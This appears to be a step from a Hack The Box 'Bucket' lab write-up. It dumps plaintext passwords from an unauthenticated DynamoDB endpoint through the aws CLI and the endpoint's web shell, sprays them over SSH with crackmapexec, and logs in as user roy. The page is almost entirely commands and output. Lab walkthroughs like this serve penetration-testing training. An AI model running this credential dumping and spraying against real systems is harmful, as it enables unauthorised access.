5 dynamodb roy
$ aws dynamodb --endpoint-url http://s3.bucket.htb list-tables
{
"TableNames": [
"users"
]
}
# can use scan to read data
$ aws dynamodb --endpoint-url http://s3.bucket.htb scan --table-name users
{
"Items": [
{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
},
{
"password": {
"S": "Welcome123!"
},
"username": {
"S": "Cloudadm"
}
},
{
"password": {
"S": "n2vM-<_K_Q:.Aa2"
},
"username": {
"S": "Sysadm"
}
}
],
"Count": 3,
"ScannedCount": 3,
"ConsumedCapacity": null
}
Using the dynamodb shell at http://s3.bucket.htb/shell/
Using API templates > ListTables
# remove all optional vars
var params = {};
dynamodb.listTables(params, function(err, data) {
if (err) ppJson(err); // an error occurred
else ppJson(data); // successful response
});
# response
"TableNames" [
"users"
]
Using API templates > Scan
# remove all optional vars
var params = {
TableName: 'users',
};
dynamodb.scan(params, function(err, data) {
if (err) ppJson(err); // an error occurred
else ppJson(data); // successful response
});
# response
{
"Items": [
{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
},
{
"password": {
"S": "Welcome123!"
},
"username": {
"S": "Cloudadm"
}
},
{
"password": {
"S": "n2vM-<_K_Q:.Aa2"
},
"username": {
"S": "Sysadm"
}
}
],
"Count": 3,
"ScannedCount": 3,
"ConsumedCapacity": null
}
$ aws dynamodb --endpoint-url http://s3.bucket.htb scan --table-name users | jq -r '.Items[].password.S'
Management@#1@#
Welcome123!
n2vM-<_K_Q:.Aa2
$ crackmapexec ssh 10.10.10.212 -u roy -p pass
SSH 10.10.10.212 22 10.10.10.212 [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4
SSH 10.10.10.212 22 10.10.10.212 [+] roy:n2vM-<_K_Q:.Aa2
$ sshpass -p 'n2vM-<_K_Q:.Aa2' ssh roy@10.10.10.212
roy@bucket:~$ whoami;id;hostname
roy
uid=1000(roy) gid=1000(roy) groups=1000(roy),1001(sysadm)
bucket
Last updated